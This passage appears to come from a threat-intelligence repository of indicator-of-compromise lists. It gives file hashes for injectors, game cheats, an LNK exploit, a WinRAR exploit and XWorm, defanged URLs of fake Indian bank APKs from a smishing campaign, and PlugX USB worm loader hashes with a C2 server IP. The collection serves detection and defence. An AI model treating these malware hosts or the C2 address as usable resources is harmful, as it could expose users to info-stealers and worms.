sha256,918796b8cc63f91baf22cb1ec8cf8078df36c81dcaadc1428a261ea793ac71b5,Hwid Spoofer.csproj 39 | sha256,8a6237ac9a90914d96490865d784a2d712ad3d3361a3d50893d33b75b865fbb5,Injector.vcxproj 40 | sha256,44d365d47a1f8d103795b7dc25f57068922fe8e0af1887066162c763c1b9f402 ,injector.vcxproj 41 | sha256,9f34a4db19d67d898420a131c6f31ba0815b009ac82a2a9925eaa07ad687eb0f,Injector.vcxproj 42 | sha256,22c5058c274b1f535a6c78c32b42ead9c79bfc1adfb3beb8ee9275fc5006e0e2,LNK Exploit MONSTERMC.vbproj 43 | sha256,668a338ccb320200dcf4c090a01f372ea49f11cbb83946f5ea893e4c2e3caa57,PUBG External.vcxproj 44 | sha256,e330638bc8c23e8b3d87ffc9615bbfc43bc8b37cfbd317e0e86ab456d5e044f9,PUBG.vcxproj 45 | sha256,e5b4ce9a84826170d613562ecf86df4e1d3aee36d7b78ff7e4fa468f7e5ce1ee,Server.csproj 46 | sha256,180c20e039a427f3154271e2a7a620f6c5b59a81c699758b4c1e7e4eae95c08f,Valorant Plus.vcxproj 47 | 
sha256,89f12803ce3ec782cd912e524a4725ade4ccf45f72dd3f47b8923bebe4464553,WinRAR Exploit.csproj 48 | sha256,424e91a5657753b8d0c45a096f74f59b97f626017e9b2a3a2bff4f543e80edcc,XWorm.csproj 49 | sha256,bcc4d8752143d6327db02e3c52bd74ce744cf98c0aeafd205019ffc87af5bd40,app.py 50 | sha256,342b5990845f9dcb8723927da482301cf8e14fcb69603edbe529260ea5207f43,app.py 51 | sha256,9838a881148d4fa9c17790ab70cced2e6c9f835d1ad3855f3e4013267dbad90c,bot.py 52 | sha256,c20f8edb938dff126e8e53add1629495a1c59c351d783eef61d3b9900a0726c5,bot_.py 53 | sha256,5854a2f5a4f5bcbae8488a5abd05095bfe74e8f5b18dfc728d8732b61ecf3118,main.py 54 | sha256,11c429b0ce110d4e9380f5a520a682c633e342c1d20538ff74869c0fe3e6e3af,main.py 55 | sha256,b5a1afb3b9de392f7478dd7de55dccb1a88ffe53351ce100b2da24bd2022b482,main.py 56 | sha256,f3cc80d90c7daee04a31317dfa36c7cb3975cabd6c63fb213aed901c8217a4d4,main.py 57 | sha256,19739d8c64656cc2b5110ba9375c54bddfcbb3b13f6e74b2360d48ffbf3b0d5e,main.py 58 | sha256,b58a2221aa767a97c49b7347b59dd67d16cb4babc206d444b0195c93c36379a7,main.py 59 | sha256,a3039bdf365755c334c8bf4d7f1792b066060daf8a16269659582d2458a7caf7,main.py 60 | sha256,ef71dc67ad8de97b39e2c98580e35402ae7dfc8f92015c1f9f689e7f2f1177ab,main_.py 61 | sha256,70e33d34fd3794ef78d5b7bd0329b65cda8ea9a343458404b6ae3a666a7a259e,player.py 62 | sha256,02c67a06b83a1482fa3ffdfe93d9ce409f1a1e92173ab720ddee52f887586ec4,script.py 63 | sha256,433138a3783bbf3033b638ed447e6fcddad64832f329cfd6b7b519fa57b31738,OTP Resou_nls..scr 64 | sha256,b27f694c974b44fe2f4a8a25680997db574fa35686c30fa4c4dc9dd4ec40005e,Payment Gateway Resou_nls..scr 65 | -------------------------------------------------------------------------------- /smishing campaign targeting Indian customers 2023-04.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data,Note 2 | Description,https://news.sophos.com/en-us/2023/04/12/tax-time-smishing-campaign/ ‎,IoCs for blog post on Indian smishing campaign April-2023 3 | 
SHA256,89a6f49ff5eefb8d1065b3a42b58e3361794206f44eb2e3d1e10d31d15aeee6d,detected as Andr/InfoStl-CO 4 | SHA256,5d95237e102f850310562299ff18eb064246a20f5fccc73a4becb892d3b0bb1f,detected as Andr/InfoStl-CO 5 | SHA256,bdf1a3778284abb232133ebb4563b8282c2b444561405a6a2f8bb0dd6b7e220b,detected as Andr/InfoStl-CO 6 | SHA256,45578ac91668bb68d3c9a55c41adf7d8fb17e402667d6aecb315e54fbac48d8a,detected as Andr/InfoStl-CO 7 | SHA256,f6cc5757af6a02532ad03fbfd8783118edfe3a4902ed94406f7c4085c6a8353a,detected as Andr/InfoStl-CO 8 | URL,hxxp://k-onc1.web.app/hdfc-ygsv3[.]apk, 9 | URL,hxxp://icici-kyc.web.app/lClCl-BANK[.]apk, 10 | URL,hxxp://allkycverify.web.app/sbi-app-v2[.]apk, 11 | URL,hxxp://k-1fyv.web.app/sbi-askv[.]apk , 12 | URL,hxxp://k-ji4sas.web.app/sbi-yv3[.]apk, 13 | -------------------------------------------------------------------------------- /usb worm with global reach.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,https://news.sophos.com/en-us/2023/03/09/border-hopping-plugx-usb-worm/,Indicators of PlugX USB worm variant active Jan-2023 3 | sha256,352fb4985fdd150d251ff9e20ca14023eab4f2888e481cbd8370c4ed40cfbb9a,"wsc.dll, malicious loader" 4 | sha256,5b807629ab299abec70f88f861487c55a6795d6e27e5d85c64080f072132558c,"wsc.dll, malicious loader" 5 | sha256,6bb959c33fdfc0086ac48586a73273a0a1331f1c4f0053ef021eebe7f377a292,"wsc.dll, malicious loader" 6 | sha256,e8f55d0f327fd1d5f26428b890ef7fe878e135d494acda24ef01c695a2e9136d,"wsc.dll, malicious loader" 7 | sha256,edaa8b62467246d9a43e0f383ed05bc3272d2f8b943a79d9d526f8225c58d1e6,"wsc.dll, malicious loader" 8 | sha256,432a07eb49473fa8c71d50ccaf2bc980b692d458ec4aaedd52d739cb377f3428," *AvastAuth.dat , payload file" 9 | IP,45.142.166.112,C2 server 10 | --------------------------------------------------------------------------------